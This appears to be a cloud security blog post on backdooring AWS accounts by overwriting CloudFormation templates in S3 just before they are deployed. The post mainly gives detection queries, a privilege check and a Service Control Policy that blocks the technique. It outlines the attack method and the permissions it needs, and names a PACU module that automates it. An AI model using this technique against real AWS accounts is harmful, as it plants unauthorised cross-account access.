Sneaky Injections - CloudFormation

During one of our recent AWS Security Reviews, I ran across an interesting technique that attackers can use to create a backdoor in AWS accounts. It works by using three S3 IAM actions, CloudFormation, and an administrator who is not careful enough.

This vector is not new but still scary - and today, I will show you how to check your account for this risk and any previous compromises.

Intro

I became aware of this attack vector on RhinoSec’s blog post a while ago but just remembered its significance during an in-depth IAM check for a customer. As the original blog entry goes into all requirements and even includes a demo video, I will only summarize the attack here and go into how to detect or prevent it:

The core idea is pretty simple - if a user or role has permissions to replace CloudFormation templates right before deploying, they can insert something like a cross-account IAM role without detection.

This vector will only require three specific permissions on an exploitable role:

  • s3:PutBucketNotification to detect a new template upload
  • s3:GetObject to get the document
  • s3:PutObject to overwrite it with a modified version

If the exploited AWS account does not have S3 Data Event logging in CloudTrail or S3 versioning enabled, chances are hight that the compromise will be unknown for a while.

Detecting Compromise

Luckily it is easy to check if your CloudFormation template buckets have notifications enabled, as AWS Config now has Advanced Queries.

Assuming you have an organization-wide, multi-region Config Aggregator configured (now might be a good time to do this, if you have not already), you can use the following query:

-- Config Query: CloudFormation Template Buckets with Notifications
SELECT
  accountId,
  resourceId,
  awsRegion,
  supplementaryConfiguration.BucketNotificationConfiguration.configurations
WHERE
  resourceType = 'AWS::S3::Bucket'
  AND resourceId LIKE 'cf-templates-%'

Usually, none of your buckets should have a notification configuration. So, if your output looks like the screenshot shown, you might have an issue. In that case, check the details of this notification and verify the use case and account ID.

Config Query Results

It is worth noticing that a savvy attacker might use this only once to deploy their backdoor and then remove the notification to evade detection.

For this case, you can use CloudTrail Lake and an SQL query to determine all PutBucketNotification actions:

-- CloudTrail Lake: S3 PutBucketNotification on CloudFormation Template Buckets
SELECT 
  eventTime,
  element_at(requestParameters, 'bucketName') as bucketName,
  awsRegion,
  userAgent,
  sourceIPAddress
FROM
  d4c16b8b-6705-481b-b731-ee1d90e1edd1
WHERE
  eventName = 'PutBucketNotification'
  AND element_at(requestParameters, 'bucketName') LIKE 'cf-templates-%'
ORDER BY eventTime DESC  

Detecting Risky Privileges

As stated previously, the critical combination of privileges is s3:PutBucketNotification, s3:GetObject and s3:PutObject on buckets starting with cf-templates-. Currently, there is no AWS built-in way to query who has this combination - but there is a tool called PMapper which I introduced in an earlier blogpost.

If you have the tool installed, you can download all your IAM data (even multi-account) and run interactive queries. For our use case, the following commands show all roles and users with the critical privileges:

# Download IAM data and create a graph database
pmapper graph create

pmapper query "who can do s3:PutBucketNotification,s3:GetObject,s3:PutObject with cf-templates-*"

Preventing this Attack

As creating such notifications on CloudFormation template buckets is a very unusual pattern, I would recommend preventing it via IAM or even with a Service Control Policy:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "PreventCfnBucketNotifications",
    "Effect": "Deny",
    "Action": "s3:PutBucketNotification",
    "Resource": "arn:aws:s3:::cf-templates-*"
  }]
}

Please check if you have valid use cases of notifications like these before deploying this document as an organization-wide policy.

Summary

This technique has been around for a while and is even part of popular penetration testing tools like PACU (see its cfn__resource_injection module).

With the recent introduction of SQL statements on AWS Config and CloudTrail, its detection has become much more accessible, and SCPs can even prevent it entirely.

As always, check your accounts and keep current on AWS news - the creativity of attackers is considerable, and there are probably plenty of variations to backdoor an AWS account if you are not careful enough.

Similar Posts You Might Enjoy

Streamlined Kafka Schema Evolution in AWS using MSK and the Glue Schema Registry

In today’s data-driven world, effective data management is crucial for organizations aiming to make well-informed, data-driven decisions. As the importance of data continues to grow, so does the significance of robust data management practices. This includes the processes of ingesting, storing, organizing, and maintaining the data generated and collected by an organization. Within the realm of data management, schema evolution stands out as one of the most critical aspects. Businesses evolve over time, leading to changes in data and, consequently, changes in corresponding schemas. Even though a schema may be initially defined for your data, evolving business requirements inevitably demand schema modifications. Yet, modifying data structures is no straightforward task, especially when dealing with distributed systems and teams. It’s essential that downstream consumers of the data can seamlessly adapt to new schemas. Coordinating these changes becomes a critical challenge to minimize downtime and prevent production issues. Neglecting robust data management and schema evolution strategies can result in service disruptions, breaking data pipelines, and incurring significant future costs. In the context of Apache Kafka, schema evolution is managed through a schema registry. As producers share data with consumers via Kafka, the schema is stored in this registry. The Schema Registry enhances the reliability, flexibility, and scalability of systems and applications by providing a standardized approach to manage and validate schemas used by both producers and consumers. This blog post will walk you through the steps of utilizing Amazon MSK in combination with AWS Glue Schema Registry and Terraform to build a cross-account streaming pipeline for Kafka, complete with built-in schema evolution. This approach provides a comprehensive solution to address your dynamic and evolving data requirements. - by Hendrik Hagen

Build Terraform CI/CD Pipelines using AWS CodePipeline

When deciding which Infrastructure as Code tool to use for deploying resources in AWS, Terraform is often a favored choice and should therefore be a staple in every DevOps Engineer’s toolbox. While Terraform can increase your team’s performance quite significantly even when used locally, embedding your Terraform workflow in a CI/CD pipeline can boost your organization’s efficiency and deployment reliability even more. By adding automated validation tests, linting as well as security and compliance checks you additionally ensure that your infrastructure adheres to your company’s standards and guidelines. In this blog post, I would like to show you how you can leverage the AWS Code Services CodeCommit, CodeBuild, and CodePipeline in combination with Terraform to build a fully-managed CI/CD pipeline for Terraform. - by Hendrik Hagen

Cross Account Kafka Streaming: Part 1

When discussing high performant real-time event streaming, Apache Kafka is a tool that immediately comes to mind. Optimized for ingesting and transforming real-time streaming data in a reliable and scalable manner, a great number of companies today rely on Apache Kafka to power their mission-critical applications and data analytics pipelines. In this blog series, I would like to show you how you can leverage Amazon MSK and Terraform to set up a fully managed, cross-account Apache Kafka streaming pipeline on AWS. In this first part, we will set up the MSK Kafka cluster and producers. The second part will show you how you can set up distributed Kafka clients in different AWS accounts and communicate with the MSK cluster via AWS VPC Endpoints. - by Hendrik Hagen